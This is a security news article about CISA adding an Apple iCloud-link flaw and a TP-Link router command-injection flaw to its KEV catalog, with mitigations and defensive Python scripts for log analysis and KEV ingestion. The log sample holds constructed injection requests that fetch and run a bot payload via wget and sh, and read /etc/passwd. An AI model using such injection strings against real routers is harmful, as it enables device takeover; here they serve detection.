CISA Adds Actively Exploited Apple and TP-Link Vulnerabilities to KEV Catalog
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added two new actively exploited flaws—impacting Apple devices and TP-Link routers—to its Known Exploited Vulnerabilities (KEV) Catalog, urging immediate mitigation. This update underscores ongoing risks to both federal and global networks, especially amid rising threats targeting consumer and enterprise infrastructure.
---
Two High-Risk Vulnerabilities Under Active Exploitation
On 16 June 2025, the [Cybersecurity and Infrastructure Security Agency (CISA)](https://www.cisa.gov/news-events/alerts/2025/06/16/cisa-adds-two-known-exploited-vulnerabilities-catalog) expanded its [Known Exploited Vulnerabilities (KEV) Catalog](https://www.cisa.gov/known-exploited-vulnerabilities-catalog) with two newly exploited security flaws:
1. CVE-2025-43200 – A logic flaw in multiple Apple products (iOS, iPadOS, macOS, watchOS and visionOS) in the handling of a maliciously crafted photo or video shared via an iCloud Link; CISA lists it as "unspecified".
2. CVE-2023-33538 – A command injection flaw in the /userRpm/WlanNetworkRpm component of TP-Link TL-WR940N, TL-WR841N and TL-WR740N routers.
These vulnerabilities meet the KEV criteria under Binding Operational Directive (BOD) 22-01, requiring Federal Civilian Executive Branch (FCEB) agencies to remediate the flaws by assigned deadlines to protect critical infrastructure.
While the BOD legally applies only to U.S. federal agencies, CISA strongly advises all public and private organizations worldwide to patch these issues immediately as part of responsible [cybersecurity](https://saintynet.com) and [vulnerability management practices](https://cybercory.com/best-practices).
---
CVE Breakdown: Apple and TP-Link at Risk
CVE-2025-43200 — Apple Devices (Multiple Products)
Apple's advisory describes the bug as a logic issue in processing a maliciously crafted photo or video shared via an iCloud Link, and says it may have been exploited in an extremely sophisticated attack against specific targeted individuals. Citizen Lab's 12 June 2025 report tied it to zero-click iMessage delivery of Paragon's Graphite spyware against journalists. The affected platforms are iOS, iPadOS, macOS, watchOS and visionOS.
- Impact: Zero-click code execution on the device (no user interaction beyond receiving the message), used to install spyware.
- Risk level: High for organizations whose executives, journalists or other likely targets carry Apple devices; exploitation observed so far has been narrowly targeted rather than indiscriminate.
- Current status: Already fixed. Apple shipped the patch on 10 February 2025 in iOS 18.3.1, iPadOS 18.3.1 and 17.7.5, macOS Sequoia 15.3.1, Sonoma 14.7.4 and Ventura 13.7.4, watchOS 11.3.1 and visionOS 2.3.1, and added the CVE to those advisories on 12 June 2025. Devices on those builds or later are protected; there is no new patch to wait for.
CVE-2023-33538 — TP-Link Router Command Injection
This older but still widely exploited vulnerability affects multiple TP-Link SOHO routers, typically used in homes and small businesses.
- Vector: OS command injection through the /userRpm/WlanNetworkRpm page of the web management interface. NVD's CVSS v3.1 vector marks it PR:L (low privileges required), so the attacker needs to reach the interface and log in, which in practice means default or weak admin credentials or an admin interface exposed to the WAN.
- Affected models: TL-WR940N V2/V4, TL-WR841N V8/V10 and TL-WR740N V1/V2, per the KEV entry.
- Mitigation: Check TP-Link's support page for the exact model and hardware revision. Several of these revisions are end-of-life, and CISA's required action for this entry is to apply vendor mitigations or discontinue use of the product if none are available. Until the device is patched or replaced, disable remote (WAN) management and change the default admin password.
---
MITRE ATT&CK Mapping & Technical Profile
TTPs and IOCs
| Technique | Description |
|-----------|-------------|
| T1190 | Exploit Public-Facing Application: CVE-2023-33538 against a TP-Link management interface reachable from the WAN |
| T1203 | Exploitation for Client Execution: CVE-2025-43200, triggered by crafted media delivered through an iCloud Link |
| T1059.004 | Command and Scripting Interpreter: Unix Shell. The injected commands run in the router's BusyBox/Linux shell (these routers do not run PowerShell) |
| T1078 | Valid Accounts: default or weak router admin credentials supply the low-privilege access the TP-Link injection requires |
| T1105 | Ingress Tool Transfer: the usual follow-on on a compromised router is a wget/curl fetch of a botnet payload |
Indicators of Compromise (IOCs): No indicators accompany the KEV entry for CVE-2025-43200; for targeted users, forensic review of the device (sysdiagnose logs) and Apple threat notifications are the realistic detection paths. For the TP-Link flaw, look for requests to /userRpm/WlanNetworkRpm whose parameter values contain shell metacharacters (;, |, backticks, $( ), requests to /userRpm/ pages from non-LAN addresses, and unexpected wget, curl or sh activity on the router.
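To make the TP-Link indicators above concrete, here is an added Python example (not code from CISA, TP-Link or the original article) that runs those checks over a few constructed router access-log lines in Common Log Format. It assumes the router's httpd logs requests in that format; the parameter names in the sample are illustrative, since the KEV entry names only the /userRpm/WlanNetworkRpm component, and the LAN ranges are the RFC 1918 blocks plus loopback and link-local.

```python
import re
import ipaddress
from urllib.parse import urlsplit, parse_qsl

# Constructed sample of router httpd access-log lines (Common Log Format); the parameter
# names are illustrative, only the /userRpm/WlanNetworkRpm component comes from the KEV entry.
SAMPLE_LOG = """\
192.168.0.23 - - [16/Jun/2025:10:01:02 +0000] "GET /userRpm/WlanNetworkRpm?ssid1=HomeNet&region=0&channel=6 HTTP/1.1" 200 1431
192.168.0.23 - - [16/Jun/2025:10:01:09 +0000] "GET /userRpm/StatusRpm HTTP/1.1" 200 2210
198.51.100.7 - - [16/Jun/2025:10:04:41 +0000] "GET /userRpm/WlanNetworkRpm?ssid1=x%60wget%20http%3A%2F%2F203.0.113.5%2Fbot%20-O%20%2Ftmp%2Fb%3Bsh%20%2Ftmp%2Fb%60&region=0 HTTP/1.1" 200 1431
198.51.100.7 - - [16/Jun/2025:10:04:42 +0000] "GET /userRpm/WlanNetworkRpm?ssid1=x%3Bcat%20%2Fetc%2Fpasswd&region=0 HTTP/1.1" 200 1431
203.0.113.9 - - [16/Jun/2025:10:07:13 +0000] "GET /userRpm/LoginRpm.htm HTTP/1.1" 200 512
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Characters that end or chain a shell command; none of them belongs in an SSID or channel field.
SHELL_META_RE = re.compile(r"[;|`&\r\n]|\$\(")

VULN_PATH = "/userRpm/WlanNetworkRpm"

# Anything outside these ranges is treated as a WAN-side source for the management interface.
LAN_NETS = [ipaddress.ip_network(n) for n in
            ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]


def parse_line(line):
    """Split one CLF line into source, timestamp, path, decoded query parameters and status."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    # parse_qsl percent-decodes names and values, so %3B / %60 become ; and ` before inspection.
    params = parse_qsl(parts.query, keep_blank_values=True)
    return {"src": m.group("src"), "ts": m.group("ts"), "path": parts.path,
            "params": params, "status": int(m.group("status"))}


def is_wan_source(ip):
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return not any(addr in net for net in LAN_NETS)


def analyze(log_text):
    """Return one finding per suspicious request, each with the reasons it was flagged."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = []
        if rec["path"].startswith("/userRpm/") and is_wan_source(rec["src"]):
            reasons.append("management page reached from non-LAN address")
        if rec["path"] == VULN_PATH:
            tainted = [name for name, value in rec["params"] if SHELL_META_RE.search(value)]
            if tainted:
                reasons.append("shell metacharacters in parameter(s): " + ", ".join(tainted))
        if reasons:
            findings.append({"src": rec["src"], "ts": rec["ts"],
                             "path": rec["path"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f["ts"], f["src"], f["path"], "; ".join(f["reasons"]))
```

Decoding the query string before matching is the important step: the injected `;` and backticks arrive percent-encoded, so a pattern applied to the raw request line would miss them. The non-LAN check fires on any /userRpm/ page, not only the vulnerable one, because a management interface answering to the WAN is itself the exposure worth fixing.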
Regional and Global Relevance: Why the MEA Should Pay Attention
Middle East and Africa Exposure
Many MEA organizations, including government agencies, SMEs, and education institutions, rely on consumer-grade routers like TP-Link for connectivity. These devices are often not patched promptly, making them a prime target for threat actors, particularly botnet operators and ransomware affiliates.
The Apple vulnerability is also concerning in BYOD-heavy environments across Africa and the Gulf, where personal Apple devices routinely access corporate and critical infrastructure systems.
“Ignoring known exploited vulnerabilities is no longer just a bad practice—it’s a direct risk to your organization’s resilience,” warns Rami Saad, Middle East Regional Director at SaintyNet Security Services. “The MEA region must adopt a zero-tolerance stance toward delayed patching, especially with KEVs.”
Global Context and Relevance
These additions to the KEV Catalog reflect a growing trend in the cybersecurity landscape: attackers targeting devices at the network edge—routers, mobile phones, and legacy endpoints—rather than hardened enterprise systems.
“Threat actors are opportunistic,” said then-CISA Director Jen Easterly in a previous alert. “They will exploit any unpatched system, regardless of geography.”
With global ransomware and APT campaigns frequently exploiting KEVs—particularly in phishing and botnet operations—prompt response to catalog updates is essential.
Actionable Takeaways for Defenders and Executives
- Immediately patch affected TP-Link routers or replace them if end-of-life.
- Verify through MDM compliance reports that Apple devices are on iOS/iPadOS 18.3.1, macOS Sequoia 15.3.1 (or the corresponding Sonoma, Ventura, watchOS and visionOS updates) or later, and enable Lockdown Mode for executives, journalists and other likely spyware targets.
- Audit network for exposed TP-Link management interfaces and disable WAN access.
- Use network segmentation to isolate BYOD and home office equipment.
- Review MITRE ATT&CK techniques associated with these vulnerabilities for threat-hunting strategies.
- Conduct regular cybersecurity awareness training with emphasis on phishing-based access attempts.
- Subscribe to CISA KEV updates and automate ingestion into your SIEM.
- Adopt a Zero Trust security architecture, particularly for remote access workflows.
- Log and analyze anomalies in network traffic, especially around router endpoints.
- Collaborate with service providers to ensure firmware updates are enforced on managed hardware.
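As an added example of the KEV-ingestion step (not code from CISA or the original article), the following Python parses the catalog's JSON layout, picks out entries added since the last run, and matches them against a small asset inventory to compute the BOD 22-01 remediation clock. The excerpt is a constructed, abridged copy of the two entries above using the feed's real field names; the inventory, asset names and the run dates are assumptions.

```python
import json
from datetime import date

# Real feed location; the example does not fetch it and runs offline on the excerpt below.
KEV_FEED_URL = "https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json"

# Constructed, abridged excerpt in the feed's JSON layout (field names are the real ones,
# the entry text is paraphrased from the 16 June 2025 additions).
SAMPLE_KEV = """{
  "title": "CISA Catalog of Known Exploited Vulnerabilities",
  "catalogVersion": "2025.06.16",
  "dateReleased": "2025-06-16T14:00:00.0000Z",
  "count": 2,
  "vulnerabilities": [
    {"cveID": "CVE-2025-43200", "vendorProject": "Apple", "product": "Multiple Products",
     "vulnerabilityName": "Apple Multiple Products Unspecified Vulnerability",
     "dateAdded": "2025-06-16", "dueDate": "2025-07-07",
     "shortDescription": "Apple products contain an unspecified vulnerability when processing a maliciously crafted photo or video shared via an iCloud Link.",
     "requiredAction": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.",
     "knownRansomwareCampaignUse": "Unknown"},
    {"cveID": "CVE-2023-33538", "vendorProject": "TP-Link", "product": "Multiple Routers",
     "vulnerabilityName": "TP-Link Multiple Routers Command Injection Vulnerability",
     "dateAdded": "2025-06-16", "dueDate": "2025-07-07",
     "shortDescription": "TP-Link TL-WR940N, TL-WR841N and TL-WR740N contain a command injection vulnerability via the component /userRpm/WlanNetworkRpm.",
     "requiredAction": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.",
     "knownRansomwareCampaignUse": "Unknown"}
  ]
}"""

# Assumed asset inventory: what we run, keyed by vendor as CISA spells it.
INVENTORY = [
    {"name": "exec-macbooks", "vendor": "Apple"},
    {"name": "branch-office-router", "vendor": "TP-Link"},
    {"name": "core-switch", "vendor": "Cisco"},
]


def load_catalog(text):
    """Parse the feed and return its list of vulnerability entries."""
    return json.loads(text)["vulnerabilities"]


def added_since(entries, last_seen_iso):
    """Entries whose dateAdded is strictly after the last run's date, for incremental ingestion."""
    cutoff = date.fromisoformat(last_seen_iso)
    return [e for e in entries if date.fromisoformat(e["dateAdded"]) > cutoff]


def match_inventory(entries, inventory, today_iso):
    """One alert per (asset, KEV entry) pair whose vendor matches, with the BOD 22-01 clock.

    Matching is on vendorProject only: CISA frequently records product as
    "Multiple Products", so product-name matching would miss entries like these.
    """
    today = date.fromisoformat(today_iso)
    alerts = []
    for asset in inventory:
        for e in entries:
            if e["vendorProject"].casefold() != asset["vendor"].casefold():
                continue
            due = date.fromisoformat(e["dueDate"])
            alerts.append({
                "asset": asset["name"],
                "cve": e["cveID"],
                "name": e["vulnerabilityName"],
                "due": e["dueDate"],
                "days_left": (due - today).days,
                "overdue": today > due,
                "ransomware_use": e.get("knownRansomwareCampaignUse", "Unknown"),
                "action": e["requiredAction"],
            })
    alerts.sort(key=lambda a: (a["days_left"], a["asset"]))
    return alerts


def to_siem_event(alert):
    """Flatten an alert into one JSON line for log shipping (key=value pairs would do as well)."""
    return json.dumps({"source": "cisa-kev", **alert}, sort_keys=True)


if __name__ == "__main__":
    entries = load_catalog(SAMPLE_KEV)
    for alert in match_inventory(added_since(entries, "2025-06-15"), INVENTORY, "2025-06-20"):
        print(to_siem_event(alert))
```

In production, replace SAMPLE_KEV with the body fetched from KEV_FEED_URL on a daily schedule and persist the last dateAdded you processed so added_since stays incremental. Matching on vendorProject rather than product is deliberate: both of these entries carry "Multiple Products"/"Multiple Routers" as the product, so a product-level match would silently drop them. The days_left field is what the SIEM should alert on, since BOD 22-01 sets the due date three weeks after dateAdded for newly catalogued CVEs.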
Conclusion: Implications and Outlook
CISA’s addition of these two high-risk vulnerabilities to the KEV Catalog is a wake-up call for organizations across all sectors and geographies. The pace of exploitation is accelerating, and the window between disclosure and real-world attacks is shrinking.
For MEA and global security leaders, proactive vulnerability management must become non-negotiable. As attacks diversify and critical infrastructure becomes more digitized, keeping pace with KEV updates is essential for ensuring resilience in an ever-evolving cybersecurity threat landscape.